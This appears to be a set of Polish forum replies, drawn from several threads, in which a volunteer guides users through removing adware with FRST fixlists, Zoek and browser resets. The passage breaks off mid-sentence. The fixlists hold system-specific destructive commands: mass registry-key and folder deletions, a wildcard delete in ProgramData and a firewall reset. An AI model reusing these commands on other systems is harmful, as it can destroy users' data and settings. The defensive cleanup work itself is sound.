EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer (x86)\iexplore.exe" dopisz dwie spacje i -extoff 3. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Zadania wykonane. Z tego co rozumiem widzisz nadal reklamy - jaki rodzaj i na jakich stronach? Zaprezentuj zrzut ekranu.

Ten ostatni skrypt był uruchamiany dwa razy, dlatego FRST nic już nie znalazł. W ostatnich logach rozszerzenia RealPlayer nie było już w Chrome, ale ten wpis RealUpgrade 1.1 tak. W związku z tym: 1. Uruchom Zoek. W oknie wklej: RealUpgrade 1.1;u Klik w Run Script. Przedstaw wynikowy log zoek-results.txt (po zmianie nazwy rozszerzenia z *.log). 2. Upłynęło sporo czasu. Na wszelki wypadek zrób nowe logi FRST (z zaznaczonym polem Addition).

Nie zapisałeś pliku Fixlist.txt w UTF-8 jak instruowałam, a poznać to można po tym, że cyrylica w jednym wpisie została przerobiona na pytajniki. Wpis został przetworzony tylko przypadkowo, gdyż FRST zinterpretował pytajniki jako znaki wieloznaczne... A dostarczony log Addition.txt jest stary z poprzedniego uruchomienia, usuwam. Poproszę o wygenerowanie nowego pliku.

Brakuje głównego raportu FRST.txt. Dołącz. PS. Wykonanie wcześniej skryptu z innego forum nic nie wniosło do sprawy, tzn. brak uszkodzeń czy wykonanej naprawy. On prawie nic nie wykonał, gdyż w skrypcie są konkretne ścieżki dostępu nieobecne oczywiście u Ciebie.

Stosowałeś ComboFix i na ten temat: KLIK. Obecnie to nie jest nawet dobry program do czyszczenia adware. I to prawdopodobnie ComboFix uszkodził poniższą instalację usuwając plik deinstalacyjny, a nie widzę na dysku Qoobox z kwarantanną, by dało się plik odzyskać: Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hager Tehalit\Semiolog\Odinstaluj.lnk -> C:\Windows\IsUn0415.exe (Brak pliku) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hager Tehalit\Elektroniczny Magnetplaner\Odinstaluj.lnk -> C:\Windows\IsUn0415.exe (Brak pliku) Jeśli chodzi o problem reklam w Google Chrome, jedyne co tu budzi podejrzenia to rozszerzenie Video AdBlock for Chrome - zainstalowane "nienormalną" metodą na poziomie rejestru, co wskazuje, że wprowadzał je zewnętrzny instalator i nie była to instalacja z Chrome Web Store. Wstępnie: 1. W Google Chrome: Zresetuj synchronizację (o ile włączona): Otwórz Panel Google. Na dole kliknij Resetuj synchronizację. Ustawienia > karta Rozszerzenia > odinstaluj Video AdBlock for Chrome. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {0EE16BFD-BA97-48AD-A384-B71CA1837667} - System32\Tasks\{9A533925-0E09-491C-A980-271CE4EA6998} => pcalua.exe -a C:\Users\Adam\Downloads\VGA_nVidia_NB9X_Vista64_Win7_64_816118757\setup.exe -d C:\Users\Adam\Downloads\VGA_nVidia_NB9X_Vista64_Win7_64_816118757 U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) S3 Tosrfcom; Brak ImagePath S3 catchme; \??\C:\ComboFix\catchme.sys [X] HKU\S-1-5-21-2241876270-1104089119-2635419705-1001\...\Policies\Explorer: [] CHR HKU\S-1-5-21-2241876270-1104089119-2635419705-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA HKU\S-1-5-21-2241876270-1104089119-2635419705-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-2241876270-1104089119-2635419705-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main RemoveDirectory: C:\ProgramData\bdch EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), już bez Addition i Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy problem reklam nadal występuje.

Tak, na pewno problemem było przeklejanie z poziomu tabletu. Ostatnie akcje pomyślnie wykonane. Na koniec: 1. Był uruchamiany GMER, toteż upewnij się, że nie wystąpiły skutki uboczne (o ile już tego nie korygowałeś): KLIK. 2. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK.

Niezbyt dużo tu widać, po prostu adware (BingSvc w starcie oraz inne w Firefox i Internet Explorer), żadnych oznak innego typu malware, więc nie widzę potrzeby wymiany haseł. Czyli: 1. Odinstaluj: Codecs for Windows 7 Pack 4.0.5 (uszkodzony, AdwCleaner wykrywa powiązane z nim komponenty), Google Chrome (strasznie stara wersja!), Java 7 Update 45 (wiadomo). Jeśli chodzi o programy integrowane z ASUS i inne dodatkowe, to można byłoby się pozbyć tego wszystkiego (wykluczając te z których użytkownik korzysta): ASUS FancyStart (HKLM-x32\...\{2B81872B-A054-48DA-BE3B-FA5C164C303A}) (Version: 1.0.8 - ASUSTeK Computer Inc.) ----> wymiana grafiki ekranu bootowania ASUS LifeFrame3 (HKLM-x32\...\{1DBD1F12-ED93-49C0-A7CC-56CBDE488158}) (Version: 3.1.7 - ASUS) ----> zrzuter ekranu / edytor powiązany z kamerą ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.0.6 - ASUS) ----> autoaktualizacja sterowników i BIOS ASUS Power4Gear Hybrid (HKLM\...\{9B6239BF-4E85-4590-8D72-51E30DB1A9AA}) (Version: 1.1.43 - ASUS) ----> tweaker zasilania ASUS SmartLogon (HKLM-x32\...\{64452561-169F-4A36-A2FF-B5E118EC65F5}) (Version: 1.0.0008 - ASUS) ----> logowanie za pomocą rozpoznawania twarzy ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 1.02.0030 - ASUS) ----> "polepszanie jakości" ekranu CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1908 - CyberLink Corp.) CyberLink Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.3602c - CyberLink Corp.) Fast Boot (HKLM\...\{13F4A7F3-EABC-4261-AF6B-1317777F0755}) (Version: 1.0.8 - ASUS) ----> menedżer startu Nuance PDF Reader (HKLM-x32\...\{B480904D-F73F-4673-B034-8A5F492C9184}) (Version: 6.00.0041 - Nuance Communications, Inc.) NVIDIA GeForce Experience 2.1.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.2 - NVIDIA Corporation) syncables desktop SE (HKLM-x32\...\{341697D8-9923-445E-B42A-529E5A99CB7A}) (Version: 5.5.746.11492 - syncables) ----> synchronizacja między urządzeniami Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation) 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mystartsearch.com/?type=hp&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mystartsearch.com/?type=hp&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mystartsearch.com/?type=hp&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mystartsearch.com/?type=hp&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} HKU\S-1-5-21-729949790-563291647-4237402503-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=SL5M&ocid=SL5MDHP&osmkt=pl-pl HKU\S-1-5-21-729949790-563291647-4237402503-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mystartsearch.com/?type=hp&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66 SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} SearchScopes: HKU\S-1-5-21-729949790-563291647-4237402503-1002 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} SearchScopes: HKU\S-1-5-21-729949790-563291647-4237402503-1002 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} SearchScopes: HKU\S-1-5-21-729949790-563291647-4237402503-1002 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = BHO: Partner BHO Class -> {83FF80F4-8C74-4b80-B5BA-C8DDD434E5C4} -> C:\ProgramData\Partner\Partner64.dll [2011-03-01] (Google Inc.) BHO-x32: Partner BHO Class -> {83FF80F4-8C74-4b80-B5BA-C8DDD434E5C4} -> C:\ProgramData\Partner\Partner.dll [2011-03-01] (Google Inc.) BHO-x32: PriceFountain -> {b608cc98-54de-4775-96c9-097de398500c} -> C:\Users\Ania\AppData\Local\PriceFountain\PriceFountainIE.dll [2015-01-11] () StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.mystartsearch.com/?type=sc&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66 FF HKLM-x32\...\Firefox\Extensions: [faststartff@gmail.com] - C:\Users\Ania\AppData\Roaming\Mozilla\Firefox\Profiles\nbsr4833.default\extensions\faststartff@gmail.com FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [Brak pliku] FF Plugin HKU\S-1-5-21-729949790-563291647-4237402503-1002: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [Brak pliku] HKLM\...\Run: [ASUS WebStorage] => C:\Program Files (x86)\ASUS\ASUS WebStorage\SERVICE\AsusWSService.exe HKU\S-1-5-21-729949790-563291647-4237402503-1002\...\Run: [Akamai NetSession Interface] => "C:\Users\Ania\AppData\Local\Akamai\netsession_win.exe" HKU\S-1-5-21-729949790-563291647-4237402503-1002\...\Run: [BingSvc] => C:\Users\Ania\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-12] (© 2015 Microsoft Corporation) HKU\S-1-5-21-729949790-563291647-4237402503-1002\Control Panel\Desktop\\SCRNSAVE.EXE -> HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> HKU\S-1-5-19\Control Panel\Desktop\\SCRNSAVE.EXE -> HKU\S-1-5-20\Control Panel\Desktop\\SCRNSAVE.EXE -> DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\BonanzaDealsLive DeleteKey: HKCU\Software\BrowseMark DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\ForumerIT DeleteKey: HKCU\Software\Google DeleteKey: HKCU\Software\InstallCore DeleteKey: HKCU\Software\MaxiGet DeleteKey: HKCU\Software\Mozilla\Extends DeleteKey: HKCU\Software\PriceFountain DeleteKey: HKCU\Software\SupHpUISoft DeleteKey: HKCU\Software\UpdateStar DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{83FF80F4-8C74-4B80-B5BA-C8DDD434E5C4} DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B608CC98-54DE-4775-96C9-097DE398500C} DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{83FF80F4-8C74-4B80-B5BA-C8DDD434E5C4} DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B608CC98-54DE-4775-96C9-097DE398500C} DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\DirectX Packages DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\V9Software DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{83FF80F4-8C74-4B80-B5BA-C8DDD434E5C4} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{D0EC4142-5808-41D2-A4DC-6081CF1A9693} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5} DeleteKey: HKLM\SOFTWARE\Wow6432Node\BrowseMark DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\mystartsearchSoftware DeleteKey: HKLM\SOFTWARE\Wow6432Node\PriceMeterLiveUpdate DeleteKey: HKLM\SOFTWARE\Wow6432Node\SupDp DeleteKey: HKLM\SOFTWARE\Wow6432Node\V9Software DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\AppID\kt_bho_dll.dll DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\AppID\{28A88B70-D874-4F73-BBBA-9B2B222FB7D6} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{83FF80F4-8C74-4B80-B5BA-C8DDD434E5C4} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{DE9028D0-5FFA-4E69-94E3-89EE8741F468} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{B608CC98-54DE-4775-96C9-097DE398500C} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{D0EC4142-5808-41D2-A4DC-6081CF1A9693} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\TypeLib\{396ECD31-EDF7-489F-BDA1-83DBA4C36E81} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\TypeLib\{86676E13-D6D8-4652-9FCF-F2047F1FB000} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\TypeLib\{9C049BA6-EA47-4AC3-AED6-A66D8DC9E1D8} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\TypeLib\{A2D733A7-73B0-4C6B-B0C7-06A432950B66} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd deleteKey: HKLM\SYSTEM\CurrentControlSet\Services\Partner Service RemoveDirectory: C:\Program Files\WinRAR RemoveDirectory: C:\Program Files (x86)\BrowseMark RemoveDirectory: C:\Program Files (x86)\Garmin RemoveDirectory: C:\Program Files (x86)\Google RemoveDirectory: C:\Program Files (x86)\SupTab RemoveDirectory: C:\Program Files (x86)\Mozilla Firefox\browser\searchplugins RemoveDirectory: C:\Program Files (x86)\Mozilla Firefox\plugins RemoveDirectory: C:\Program Files (x86)\Mozilla Thunderbird RemoveDirectory: C:\ProgramData\Adobe RemoveDirectory: C:\ProgramData\ALLPlayer RemoveDirectory: C:\ProgramData\BonanzaDealsLive RemoveDirectory: C:\ProgramData\Electronic Arts RemoveDirectory: C:\ProgramData\Garmin RemoveDirectory: C:\ProgramData\Origin RemoveDirectory: C:\ProgramData\Partner RemoveDirectory: C:\ProgramData\Skype RemoveDirectory: C:\ProgramData\WindowsMangerProtect RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avalon RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Codecs for Windows 7 Pack RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sierra RemoveDirectory: C:\Users\Ania\AppData\Local\BonanzaDealsLive RemoveDirectory: C:\Users\Ania\AppData\Local\Facebook RemoveDirectory: C:\Users\Ania\AppData\Local\Garmin RemoveDirectory: C:\Users\Ania\AppData\Local\genienext RemoveDirectory: C:\Users\Ania\AppData\Local\Google RemoveDirectory: C:\Users\Ania\AppData\Local\Mobogenie RemoveDirectory: C:\Users\Ania\AppData\Local\PriceFountain RemoveDirectory: C:\Users\Ania\AppData\Local\PriceMeter RemoveDirectory: C:\Users\Ania\AppData\Local\Thunderbird RemoveDirectory: C:\Users\Ania\AppData\Local\Microsoft\BingSvc RemoveDirectory: C:\Users\Ania\AppData\Local\Microsoft\Windows\GameExplorer\{F16DF3ED-1A45-4966-8A2A-ED2D02E279EE} RemoveDirectory; C:\Users\Ania\AppData\Roaming\BitComet RemoveDirectory: C:\Users\Ania\AppData\Roaming\Garmin RemoveDirectory: C:\Users\Ania\AppData\Roaming\mystartsearch RemoveDirectory: C:\Users\Ania\AppData\Roaming\newnext.me RemoveDirectory: C:\Users\Ania\AppData\Roaming\OpenCandy RemoveDirectory: C:\Users\Ania\AppData\Roaming\Systweak RemoveDirectory: C:\Users\Ania\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mobogenie RemoveDirectory: C:\Users\Ania\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PriceFountain RemoveDirectory: C:\Windows\SysWOW64\AI_RecycleBin RemoveDirectory: C:\Windows\SysWOW64\C2MP C:\ProgramData\*.* C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS Utility\e-Driver.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS Utility\eManual.Lnk C:\Users\Ania\daemonprocess.txt C:\Users\Ania\AppData\Local\WebpageIcons.db C:\Users\Ania\AppData\Roaming\Microsoft\Windows\SendTo\Android (ALLPlayer Pilot).lnk C:\Windows\SIERRA.INI C:\Windows\system32\roboot64.exe CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox z adware: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść całą historię przeglądania. 4. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Ania\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 5. Wyczyść Dzienniki zdarzeń (gałęzie Aplikacja + System) i po tym zresetuj Windows, by się nagrały nowe błędy. Zrób nowy log FRST z opcji Skanuj (Scan), z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Otwórz załączony plik fixlog.txt - podczas przeklejania skryptu do Notatnika wystąpiły błędy, tzn. wszystkie linie zostały sklejone oraz pojawiły się artefakty (encje HTML, których w logu nie było). Skrypt wklejony do Notatnika musi mieć identyczne przejścia do nowej linii jak w moim poście. Konsekwencją jest, że skrypt FRST nie przetworzył wszystkich obiektów jak należy. Kolejne poprawki: Otwórz Notatnik i wklej w nim (6 linii): AppInit_DLLs: C:\DOCUME~1\ALLUSE~1\DANEAP~1\Lightzap\Viva-Ex.dll => Brak pliku SearchScopes: HKLM -> DefaultScope {ielnksrch} URL = SearchScopes: HKU\S-1-5-21-1993962763-1801674531-1606980848-1003 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = CHR HomePage: Default -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csCgilr6SpemyARzQtGnhdvRN9XuvTfNFYA54KEhemNWHT48ThQPQwQVqDQ5KH4pAI7Nzb7ygy76KzzgQdD78O06WAHxEZZWaDmfjnNwnoxijbVAG-WYSm4UEwTomhN43hbJEh-y6-ZMO0gNWamCTQ,, RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. Wątpię. To co było w systemie to adware, a w tym typie Kaspersky nie jest aż tak specjalizowany.

Wszystko pomyślnie wykonane. Kolejna porcja czynności: 1. W Google Chrome: Zresetuj synchronizację (o ile włączona), punkt 2: KLIK. Ustawienia > karta Ustawienia > Ustaw Google Chrome jako domyślną przeglądarkę. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. 2. Otwórz Notatnik i wklej w nim: HKU\S-1-5-21-2442656019-2658457348-799937204-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www-searching.com/?pid=s&s=G1Szamobl15047,5760a648-8657-4332-9046-87f354fc5f2b,&vp=ch&prd=set_ie SearchScopes: HKU\S-1-5-21-2442656019-2658457348-799937204-1002 -> {D781B30C-5460-4760-84E6-8193ED359A44} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=G1Szamobl15047,5760a648-8657-4332-9046-87f354fc5f2b, CHR HKU\S-1-5-21-2442656019-2658457348-799937204-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 C:\Users\Piotr Nalewajko\AppData\Local\svcxdcl32.dat RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\MATS RemoveDirectory: E:\Users\Piotr RemoveDirectory: E:\Users\Piotr.SadBanana RemoveDirectory: E:\Users\SadB Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie powinno być restartu (ale nie jest wykluczony). Przedstaw wynikowy fixlog.txt. 3. Wykonaj polecenie sfc /scannow, przefiltruj CBS.log i przedstaw końcowy log: KLIK.

Wszystko zrobione. Kończymy: 1. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. 2. W Dzienniku zdarzeń są takie oto błędy: Dziennik System: ============= Error: (02/06/2016 09:56:36 PM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: Usługa HP CUE DeviceDiscovery Zawieszenia usługi Hewlett-Packard, które powinno mieć odbicie w dłuższym uruchamianiu systemu. Wyłącz usługę. Start > w polu szukania services.msc > z prawokliku Uruchom jako Administrator > dwuklik na w/w usługę i Typ uruchomienia przestaw na Wyłączony. Dziennik Aplikacja: ================== Error: (02/06/2016 09:55:42 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Błędzik natury kosmetycznej, ale można go zlikwidować posługując się 